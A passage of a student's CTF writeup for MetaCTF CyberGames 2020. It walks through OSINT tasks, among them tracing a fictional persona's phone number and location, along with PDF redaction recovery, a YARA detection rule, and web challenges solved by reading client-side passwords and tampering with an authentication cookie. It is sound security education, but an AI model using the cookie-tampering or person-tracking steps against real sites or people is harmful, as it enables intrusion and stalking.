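    return mix(read_wav(leaked_wav), invert(read_wav(studio_wav)))

# Constructed data: half a second of a 440 Hz tone as the "studio" track, plus a quiet pulse
# pattern (amplitude 200, far below the music) as the watermark mixed into the "leak".
N = RATE // 2
STUDIO = [int(12000 * math.sin(2 * math.pi * 440 * i / RATE)) for i in range(N)]
WATERMARK = [200 if (i // 400) % 2 == 0 else 0 for i in range(N)]
LEAKED = mix(STUDIO, WATERMARK)
STUDIO_WAV, LEAKED_WAV = write_wav(STUDIO), write_wav(LEAKED)

if __name__ == "__main__":
    residual = null_test(STUDIO_WAV, LEAKED_WAV)
    print("peak of studio track:", max(abs(s) for s in STUDIO))
    print("peak of residual:", max(abs(s) for s in residual))
```

Two details carry over to real files: the tracks must be sample-aligned (an offset of even one sample leaves the music in the residual), and any resampling or lossy transcoding between the two copies adds its own residual, which is why the challenge hands out lossless FLAC.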

Reconnaissance

Big Breaches

150 points/solved by 718 teams

How many unique emails were exposed in the biggest single collection of breached usernames/passwords? Provide the answer (flag) in the format MetaCTF{###,###}.

The biggest single collection of breached usernames and passwords available online is almost certainly Collection #1 from 2019. From a quick search, it contains 772,904,991 usernames and passwords. The flag is MetaCTF{772,904,991}.

Not So Itsy Bitsy Spider

200 points/solved by 710 teams

Recent reporting indicates that a prominent ransomware operator, known as WIZARD SPIDER, was able to deploy Ryuk ransomware in an environment within 5 hours of compromise.

What recent, critical vulnerability was exploited in this environment to gain elevated privileges?

The flag will be in the following format:

CVE-XXXX-XXXX

Since the challenge asks for a “recent” and “critical” vulnerability that is exploited by Ryuk, try searching online for “Ryuk CVE 2020” and checking if any critical vulnerabilities appear in the results.

A search result “Ryuk in 5 Hours — The DFIR Report”
The first result when searching for “Ryuk CVE 2020”

The first result mentions CVE-2020-1472, also known as Zerologon. It is a privilege escalation vulnerability in Windows’ Netlogon service. Does NIST (the maintainer of the National Vulnerability Database, which assigns CVEs severity scores) rate this CVE as critical?

A screenshot of CVE-2020-1472 from the NIST NVD
The National Vulnerability Database (NVD) listing for CVE-2020-1472

Yes, they do. The flag is CVE-2020-1472.

Diving into the announcement

225 points/solved by 499 teams

Vulnerabilities are patched in software all the time, and for the most serious ones, researchers work to build proof-of-concept (POC) exploits for them. As defenders, we need to continuously monitor when new public exploits drop, figure out how they work, and ensure we’re protected against them. Recently, Microsoft announced CVE-2020-1472. Your task is to locate a public exploit for it and identify the vulnerable function that the POCs call. The flag will be the function’s name.

A great place to find POCs for various exploits is on GitHub. Start by searching for the CVE there. This repo that contains a POC Python script looks like a good one. Since CVE-2020-1472 is the Netlogon Escalation of Privilege vulnerability, any function calls in the repo should start with nrpc (for Netlogon Remote Protocol). Helpfully, there is a function in the Python script called exploit() that calls NetrServerPasswordSet2(). As it is the only function called in exploit(), this ended up being the flag.

Finding Mr. Casyn

275 points/solved by 307 teams

This is the first of three challenges related to the Casyn persona.

We’re looking for a Mr. Casyn, who has been reported missing. We believe he lives in the Chicagoland area, but don’t think he’s in Illinois proper. We need your help finding him and identifying the right Mr. Casyn will help us begin our search.

The flag for this challenge is the first name of Mr. Casyn. There are three attempts available for this challenge.

Note: Mr. Casyn is a fake persona that we have created to help you practice your OSINT skills.

To begin this challenge, let’s gather what we know about our persona:

  1. Last name: Casyn
  2. Lives in: Chicagoland area
  3. Lives in: not Illinois

First, let’s search for a Mr. Casyn and see what comes up:

Google search results for “mr. casyn”
Lots of “Casyn”s available online, I guess…

The top results do not point towards an obvious answer, and with 128,000 results, it would be infeasible to look for him manually. Instead, let’s narrow down our search. We know the general area where he lives: Chicagoland outside of Illinois. According to Wikipedia, the Chicagoland area comprises the following cities:

A screenshot of the Wikipedia page for the Chicago metropolitan area
A screenshot of the Wikipedia page for the Chicago metropolitan area
Wikipedia’s list of cities considered part of “Chicagoland”

We see three cities outside of Illinois: Kenosha, Wisconsin, Hammond, Indiana, and Gary, Indiana. Let’s try attaching these cities to Casyn’s name in our search. The results for searching “casyn hammond” are below:

Google search results for “casyn hammond”
A relevant link

Sure enough, we found the Facebook profile of a Vedder Casyn, who turned out to be the target. Unfortunately, the Facebook profile was taken down shortly after the challenge started (we’re unsure why), but we were able to use that name to discover his Twitter profile:

A screenshot of Vedder Casyn’s Twitter profile
Found you, Vedder Casyn!

Now we have his name and his website: veddercasyn.me.

Complete Transparency

325 points/solved by 206 teams

At ICMP Industries, we recently created a new subdomain off of our company website. Since our new super secret project is still in development, we chose a long subdomain so no one will know to visit it yet. We also went ahead and upgraded the site to use HTTPS to be more secure.

The flag is the name of our secret subdomain. Note there are dashes between words instead of underscores since it’s a domain name.

Let’s try visiting https://icmpindustries.com/.

Screenshot of a 403 Forbidden error
A 403 error from Cloudflare

The company may not be hosting anything on the main site. However, they do say they added HTTPS to the subdomain for extra security. This means that a certificate had to be issued to the subdomain. Try using a tool such as Censys to find the certificate.

A screenshot of the Censys website showing the subdomains of icmpindustries.com
Censys, a tool that indexes certificates issued to websites, among other things

The flag is a-transparent-but-not-invisible-flag.icmpindustries.com.

Ring Ring

325 points/solved by 221 teams

This is the second of three challenges related to the Casyn persona.

We want to try and reach out to Mr. Casyn via telephone. Can you figure out his phone number?

Flag format: XXX-XXX-XXXX. Example: 123-456-7890

Here’s the information we currently know about Mr. Casyn:

  1. Full name: Vedder Casyn
  2. Lives in: Hammond, IN
  3. Facebook profile: https://www.facebook.com/vedder.casyn.5
  4. Linkedin profile: https://www.linkedin.com/in/vedder-casyn/
  5. Twitter profile: https://twitter.com/veddercasyn/with_replies
  6. Github profile: https://github.com/veddercasyn/
  7. Website: https://veddercasyn.me/

We’re looking for his phone number, but unfortunately, it doesn’t appear on any of the accounts above. The cached content of his profiles and websites does not reveal anything, either. However, it is possible that Vedder had more information on his website in the past that he decided to remove. In that case, the only place left to look is the version history of the webpage on Github. Going to https://veddercasyn.github.io/index.md and looking at the commit history gives us a list of a few dozen commits — a lot, but nothing that we can’t look through manually. Fortunately, each one is relatively small. Looking at commit 9257913276447d19f8e08d91ebce83743ff11063, we see the following change:

A screenshot of a GitHub commit containing a phone number
He removed his phone number from his website but forgot to rewrite his commit history!

And there’s his phone number: 929-249-4018.

Hangout Spots

525 points/solved by 127 teams

This is the third of three challenges related to the Casyn persona.

There was no reply from Mr. Casyn’s phone. Can you find out where he likes to frequently hang out so we can look for clues of where he’s been recently? Once you find the image, think of how we can use what we know to geolocate the image based on what’s in the picture.

Flag format is street name, city, state abbreviation zip code. Example: 301 Park Ave, New York, NY 10022

Side note: enjoying the OSINT? Check out https://www.tracelabs.org/ for ways that you can put those skills to use!

Now we have his phone number, but we need to find his exact location. The problem asks to find a common hangout spot, but his website only has this:

A screenshot of a restaurant on Vedder Casyn’s website
Unfortunately, it doesn’t look like this is his hangout spot.

He says he doesn’t go here often and the address of this building (discovered through reverse image search) wasn’t the answer. Remembering what we did in the Ring Ring challenge, let’s go back to his GitHub version history and see if we can uncover anything.

A screenshot of a GitHub commit containing an image link
He forgot to rewrite his commit history again.

At one point, Mr. Casyn revealed his hangout spot. The removed Imgur link above contains the following image:

A photo of a building with sun glare
There is an antenna with two satellites on it in the background. Is this enough to find the location?

Now we must discover the location of this building. Looking at the image's left-hand side, we can faintly see a Google watermark, meaning it’s most likely a screenshot from Google Maps’ Street View. Unfortunately, this means there’s no EXIF data in the image. Something is visible in the upper left window, but we can’t make out what it is. Instead, we’ll have to use landmarks in the image to discover the location.

Behind the building, we can see a large radio tower with several radome antennas on it. Anyone into amateur radio will know that all structures like this in the United States must be registered with the FCC.

Fortunately, the FCC keeps a public database of all registered antenna structures along with their exact locations.

Let’s try an advanced search and put in Hammond, IN, but only for towers that are constructed:

A screenshot of the FCC antenna search application
All antenna structures must be registered with the FCC in this database.

We obtained 18 results, a number reasonable enough to look through manually:

A screenshot of the FCC’s antenna structure database with results
The sixth result is interesting…

We can take the coordinates of each site and put them into Google Maps. Now let’s look at the antenna tower registered to the Hammond Police Department, the sixth result in the list, from the coordinates listed. Go into the street view for a better look at the tower.

An antenna structure with two dome satellites affixed halfway up
The satellites’ positions appear to match.

That certainly looks similar to the tower in the image removed from Mr. Casyn’s website. Since we know what the building roof in the original image looks like, let’s look around for it in the satellite view.

Two nearby buildings have matching roofs.

The Hammond Public Library, across the street from the police station, looks sort of like the one in our original picture: similar roof, similar parking lot, similar trees. Let’s go down to the street view and see if it matches.

That’s a match!

We have a match! Going into street view on State Street right outside the Hammond Public Library gives us the image that Mr. Casyn previously published on his website. Finally, we know his hangout spot.

The flag is the address of the library: 564 State St, Hammond, IN 46320.

Side note: Yes, I am enjoying the OSINT! In fact, I participated in my first Trace Labs Search Party just last week at conINT!

Reverse Engineering

[REDACTED]

225 points/solved by 509 teams

The CEO of Cyber Corp has strangely disappeared over the weekend. After looking more into his disappearance, the local police department thinks he might have gotten caught up in some illicit activities.

The IT Department just conducted a search through his company-provided laptop and found an old memo containing a One-Time Password to log into his e-mail. However, it seems as if someone has redacted the code. Can you recover it for us?

The given PDF is a scan of a paper document with a censor bar placed on top of the document, probably with some software. This means that the scanned document itself is one whole object in the PDF file and the censor bar is another object. First, let’s see what the PDF file looks like:

A memo with a black redaction bar placed on top of the flag
The redacted PDF document

We will use peepdf to analyze the objects in the PDF:

A screenshot of the terminal with peepdf results
There is a large jump between the fifth and sixth offsets.

It looks like Object 5 is the largest one, so it’s probably safe to assume that it contains the original scanned document. Let’s extract it into a jpg file using rawstream:

PPDF> rawstream 5 > docoutput.jpg

We can now see the original PDF:

The memo without a black redaction bar placed on top of the flag
The flag is clearly visible.

The flag is MetaCTF{politics_are_for_puppets}.
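The peepdf step above works because the redaction bar and the scanned page are separate objects, and the scan is by far the largest stream. Here is an added example (my own code, not from the writeup or from peepdf) that does the same thing: list every stream object in a PDF and pull out the biggest one. It runs on a constructed PDF whose object 4 draws a black box over the page and whose object 5 is the untouched "scan".

```python
"""Added example, not code from the writeup or peepdf: lists stream objects
in a PDF and extracts the largest, mirroring `rawstream 5 > docoutput.jpg`.
The SAMPLE_PDF below is constructed for this demo, not the challenge file."""
import re

OBJ_RE = re.compile(rb"(\d+)\s+0\s+obj(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def extract_streams(pdf: bytes) -> dict:
    """Map object number -> raw (still encoded) stream bytes for each stream object."""
    out = {}
    for m in OBJ_RE.finditer(pdf):
        s = STREAM_RE.search(m.group(2))
        if s:
            out[int(m.group(1))] = s.group(1)
    return out


def largest_stream(pdf: bytes) -> tuple:
    """The biggest stream is the likeliest place for a full-page scanned image."""
    streams = extract_streams(pdf)
    num = max(streams, key=lambda n: len(streams[n]))
    return num, streams[num]


def is_jpeg(blob: bytes) -> bool:
    """DCTDecode streams are plain JPEG data, which starts with the SOI marker."""
    return blob[:3] == b"\xff\xd8\xff"


# Constructed sample: object 4 paints a black rectangle (the "redaction") on top
# of the page; object 5 is the original image, left fully intact underneath.
FAKE_SCAN = b"\xff\xd8\xff\xe0" + b"\x00" * 600 + b"\xff\xd9"
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R "
    b"/Resources << /XObject << /Im0 5 0 R >> >> >> endobj\n"
    b"4 0 obj << /Length 54 >>\nstream\n"
    b"q 612 0 0 792 0 0 cm /Im0 Do Q 0 g 100 500 300 30 re f"
    b"\nendstream\nendobj\n"
    b"5 0 obj << /Type /XObject /Subtype /Image /Width 1 /Height 1 "
    b"/Filter /DCTDecode /Length " + str(len(FAKE_SCAN)).encode()
    + b" >>\nstream\n" + FAKE_SCAN + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    num, blob = largest_stream(SAMPLE_PDF)
    print(f"object {num}: {len(blob)} bytes, jpeg={is_jpeg(blob)}")
```

Real PDFs may compress streams or split a page across several objects, so treat the "largest stream" heuristic as a starting point, not a guarantee.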

Precision Matching

375 points/solved by 16 teams

YARA describes itself as a pattern matching swiss knife for malware researchers. I like to think of it though as a precision strike weapon (without the explosion part of course) for seeking out malware based on a configurable, very specific set of characteristics. In addition, it’s quite helpful for identifying related samples built by the same malware author. We recently uncovered a malware author using

a) dynamic imports for their calls to CreateRemoteThread, and

b) Visual Studio 2019.

Here’s the one sample we’ve managed to recover so far. We’d like you to visit our YARA Rule Making Studio and craft a rule to match only these characteristics — no false positives!

About Yara

Yara, created by VirusTotal, is a signature-based method for detecting malware (and many other things). Looking at the documentation for writing Yara rules is helpful for this challenge. The challenge creator has helpfully provided us with a website to check our solution.

A screenshot of the Yara Rule Checking application with a blank rule pre-filled
The Yara Rule Checker, how nice!

We are given an empty Yara rule to start with:

rule yarp {
    condition:
        false
}

This doesn’t detect any of the files as infected.

A screenshot of the Yara Rule Checking application with no matches
Yara matching results for the empty rule

Matching on Strings

The first signature we need to match on for this rule is the dynamic import for calls to CreateRemoteThread. Define a new string variable with the value CreateRemoteThread. When a string is defined, it must be added to the rule's conditional statement, which tells Yara how to use it.

Currently, our rule looks like this:

rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt
}

Hmmm… this rule matches all of the samples.

A screenshot of the Yara Rule Checking application matching all files
Yara rule matching for the string rule

Limiting scope

We can assume from the result that every file the site checks against the Yara rule imports CreateRemoteThread. However, by examining the provided binary, it looks like the dynamic calls to CreateRemoteThread only appear near the start of the file, up to 0x0002CC50. Yara allows us to restrict a string match to a range of file offsets by using the in operator. Set the rule to search from the beginning of the file (0x1) up to 0x0002CC50.

rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt in (0x1..0x0002CC50)
}

We are getting closer!

A screenshot of the Yara Rule Checking application matching with two false positives
Yara rule matching for the dynamic calls rule

Avoiding false positives

However, that is not enough to avoid false positives, so let’s add the second condition: the malware was created using Visual Studio 2019. Since we are analyzing .exe files (portable executables, or PE files), we know that each file contains a header with metadata, including information about the tools used to create it. According to Microsoft’s documentation, this field is the minor linker version. Yara exposes it through its PE module’s linker_version object. Since we need to match Visual Studio 2019, add another condition requiring pe.linker_version.minor to be greater than 20 (Visual Studio version numbers are usually the year they were released + 1). The PE Yara module needs to be imported for this to work, and the two conditions are joined with and.

import "pe"

rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt in (0x1..0x0002CC50) and
        pe.linker_version.minor > 20
}

Does the rule pass?

A screenshot of the Yara Rule Checking application matching correctly
Yara rule matching for the linker version rule

Yes! The flag is MetaCTF{wielding_the_mighty_power_of_yara_to_stop_the_hackers}.
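To make clear what the final rule actually reads from a file, here is an added example (my own code, not from the writeup or from the YARA project) that pulls the linker version out of the PE optional header and reproduces the `$crt in (0x1..0x0002CC50)` offset check by hand. The build_sample helper and the PE-shaped blobs it produces are constructed for testing only.

```python
"""Added example, not code from the writeup or from YARA: reads the two
signals the final rule uses straight from PE bytes, so you can see what
pe.linker_version.minor and `$crt in (0x1..0x0002CC50)` actually check."""
import struct

PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_SIZE = 20
CRT_RANGE = (0x1, 0x0002CC50)  # offset range from the writeup's rule


def linker_version(data: bytes) -> tuple:
    """Return (major, minor) from the PE optional header.

    Per the PE/COFF spec: e_lfanew at 0x3C points to 'PE\\0\\0', the 20-byte
    COFF header follows, and the optional header starts with Magic (2 bytes),
    MajorLinkerVersion (1 byte), MinorLinkerVersion (1 byte)."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + COFF_HEADER_SIZE
    major, minor = struct.unpack_from("<BB", data, opt + 2)
    return major, minor


def crt_in_range(data: bytes, lo: int = CRT_RANGE[0], hi: int = CRT_RANGE[1]) -> bool:
    """Mirror of `$crt in (lo..hi)`: some occurrence starts at an offset in [lo, hi]."""
    needle = b"CreateRemoteThread"
    pos = data.find(needle)
    while pos != -1:
        if lo <= pos <= hi:
            return True
        pos = data.find(needle, pos + 1)
    return False


def matches_rule(data: bytes) -> bool:
    """Same logic as: $crt in (0x1..0x0002CC50) and pe.linker_version.minor > 20"""
    return crt_in_range(data) and linker_version(data)[1] > 20


def build_sample(minor_linker: int, crt_offset: int) -> bytes:
    """Constructed, non-executable PE-shaped blob for exercising the checks."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # PE header right after the DOS stub
    optional = struct.pack("<HBB", 0x20B, 14, minor_linker) + bytes(0xF0 - 4)
    image = bytes(dos) + PE_SIGNATURE + bytes(COFF_HEADER_SIZE) + optional
    return image.ljust(crt_offset, b"\0") + b"CreateRemoteThread" + bytes(0x100)
```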

Web Exploitation

High Security Fan Page

125 points/solved by 832 teams

Uh oh, I woke up to hear that some Swifties seem to have sabotaged my Katy Perry fan page! After writing about why KP is clearly the better artist, I believe they hacked into the system and somehow changed my password! I need to publish a big story today before TMZ steals my scoop, however I can’t find my way back into the admin panel. Can you please help me out by finding my password so I can get back to work?

Note: Obviously most sites aren’t built like this, but it’s good to get familiar with examining what a website’s source code looks like, how resources get loaded in, etc :)

Click here to visit the site

By checking out the source code through the developer console, we can see a framework.js script loaded. This script contains the function authenticate():

function authenticate(){
    var username = document.getElementById("inputUsername").value;
    var password = document.getElementById("inputPassword").value;
    var notFailed = true;
    if(username!="ChrisM"){
        alert("You did not enter the correct username!");
        notFailed = false;
    }
    if(password!="MetaCTF{So_You_Wanna_Play_With_Magic}"){
        alert("You did not enter the correct password!");
        notFailed = false;
    }
    if(notFailed){
        alert("Hiya!");
        window.location.pathname = './a3263ca2855a26f06bd679ac3e240af9/adminpanel.html';
    }
}

Client-side authentication is very unsafe because it allows an attacker to view and manipulate the login process. The flag is MetaCTF{So_You_Wanna_Play_With_Magic}.

Barry’s Web Application

150 points/solved by 781 teams

I’ve made this cool new web application that I plan to use to host a blog. Please check it out at

http://host1.metaproblems.com:5620/

Right now it’s still currently being built, but I hope you enjoy what’s there so far!

Browsing to the provided address gives us the webpage.

A screenshot of the “Barry’s web server” website
Barry’s website

To access the documents, we might try spidering the webpage to see what other directories are available. An easy way to do this is with ZAP’s spider.

A screenshot of the OWASP ZAP main page
ZAP is OWASP’s automated web vulnerability scanner.

By default, ZAP won’t try to spider above the lowest directory indicated in the URL field, so set it to http://host1.metaproblems.com:5620/dev/.

A screenshot of ZAP’s results for Barry’s website
“Directory browsing is enabled.”

It isn’t even necessary to spider because directory browsing is enabled, and the documents directory already shows up in the results. Directory listing may reveal hidden scripts, include files, backup source files, and other files that can be accessed to read sensitive information, which is why this feature should always be disabled.

Browse to /docs to find the hidden files.

A screenshot of a webpage showing the flag
The hidden file in the ‘/docs’ directory

The flag is MetaCTF{Dont_l3t_y0ur_d1rect0ries_b3_l1st3d}.

Everyone Loves a Good Cookie

175 points/solved by 615 teams

Cookies are used by websites to keep track of user sessions and help with authentication. Can you spot the issue with this site and convince it that you’re authenticated?

The website asks for a secret code to log in.

A screenshot of the website prompting for a secret code
We don’t have a secret code, oh no…

It sets a cm-authenticated cookie with the value 0 when an incorrect secret code is entered.

A screenshot of Chrome’s cookie manager
The cm-authenticated cookie set by the website

We can manipulate this cookie using BurpSuite. First, make sure that your browser is configured to use BurpSuite’s proxy. Then, on the Proxy tab, turn on Intercept and browse to the challenge site in your browser.

The raw request is seen in BurpSuite.

A screenshot of BurpSuite’s proxy tool
BurpSuite is a popular web application manipulation tool and proxy.

Right-click anywhere in the request and select “Send to Repeater.” This will allow us to manipulate the cookie value. The Repeater tab should light up. In the Params tab, double-click the value of the cookie to edit it. Set the value to 1. Also, remove the password field using the button on the right so that the cookie isn’t set back to 0 when the request is submitted.

A screenshot of BurpSuite’s repeater tool
The ‘cm-authenticated’ cookie is set to 1. Do we still need a password?

Now click the “Send” button.

A screenshot of BurpSuite’s repeater tool
The flag is visible in the response.

The raw response is displayed on the right. The flag is MetaCTF{oscar_says_i_love_trash_and_cookies}.
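The site fell because it trusted a cookie value the client controls. Here is an added example (my own code, not from the writeup or the challenge site) showing the naive check next to a fixed version that signs the cm-authenticated value with an HMAC, so the Repeater edit from 0 to 1 no longer verifies. SERVER_KEY and the tamper helper are constructed for the demo.

```python
"""Added example, not code from the writeup or the challenge: the naive
`cm-authenticated` check next to an HMAC-signed version that rejects edits.
SERVER_KEY is a constructed placeholder, not a value from the challenge."""
import hashlib
import hmac
from typing import Optional

SERVER_KEY = b"constructed-demo-key-do-not-ship-keys-in-source"
COOKIE_NAME = "cm-authenticated"


def _tag(value: str, key: bytes) -> str:
    """HMAC-SHA256 over name=value, so the tag is bound to this cookie."""
    return hmac.new(key, f"{COOKIE_NAME}={value}".encode(), hashlib.sha256).hexdigest()


def issue_cookie(authenticated: bool, key: bytes = SERVER_KEY) -> str:
    """Server side: '1' or '0' followed by its tag, e.g. '0.<hex>'."""
    value = "1" if authenticated else "0"
    return f"{value}.{_tag(value, key)}"


def is_authenticated(cookie: Optional[str], key: bytes = SERVER_KEY) -> bool:
    """Server side: accept only a '1' whose tag verifies under the server key."""
    if not cookie or "." not in cookie:
        return False
    value, tag = cookie.split(".", 1)
    # compare_digest keeps the comparison time independent of where tags differ
    return hmac.compare_digest(tag, _tag(value, key)) and value == "1"


def naive_is_authenticated(cookie: Optional[str]) -> bool:
    """The challenge site's behaviour: the client-supplied value is trusted as is."""
    return cookie == "1"


def tamper(cookie: str) -> str:
    """What the Repeater edit did: flip the leading value to '1', keep the rest."""
    return "1" + cookie[1:]
```

A signed value still reveals the flag's on/off state to the user; keep the session state server-side, or encrypt as well as sign, if the contents themselves are sensitive.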

Bonus Flags

CyberGames 2020 Design Bonus

75 points

There was a bonus flag hidden in this year’s CyberGames logo.

The logo with various encodings in the image
The CyberGames 2020 logo
  • The octal on the bottom left decodes to welcome_to_the_.
  • The hex on the top left decodes to CyberGames_shall_we_.
  • The Morse code around the inner circle decodes to play_a_.
  • The binary on the right decodes to game?.

The bonus flag is MetaCTF{welcome_to_the_CyberGames_shall_we_play_a_game?}

In Conclusion

With 6,750 points, our score placed us in 36th overall and 24th among the student teams. This qualified us for swag bags and t-shirts (top 30 teams in each category) — my first time receiving a prize for a CTF!

It was cool to see how far my teammates and I have come in developing our skills and solving CTF challenges. I spent most of my time with the forensics challenges and solved all but two of them, which I definitely wouldn't have been able to do a few years ago. However, I also learned that I don’t have much packet capture analysis experience, which I plan to work on.

Finally, thank you to all the MetaCTF organizers for their time and effort put into this competition. I am looking forward to MetaCTF’s 2021 Cyber Games (maybe even in person again)!

Written by

DFIR, CTFs, disinformation, STEM education, and pretty much anything else that comes to mind. RIT Computing Security ’22. wyatttauber.com
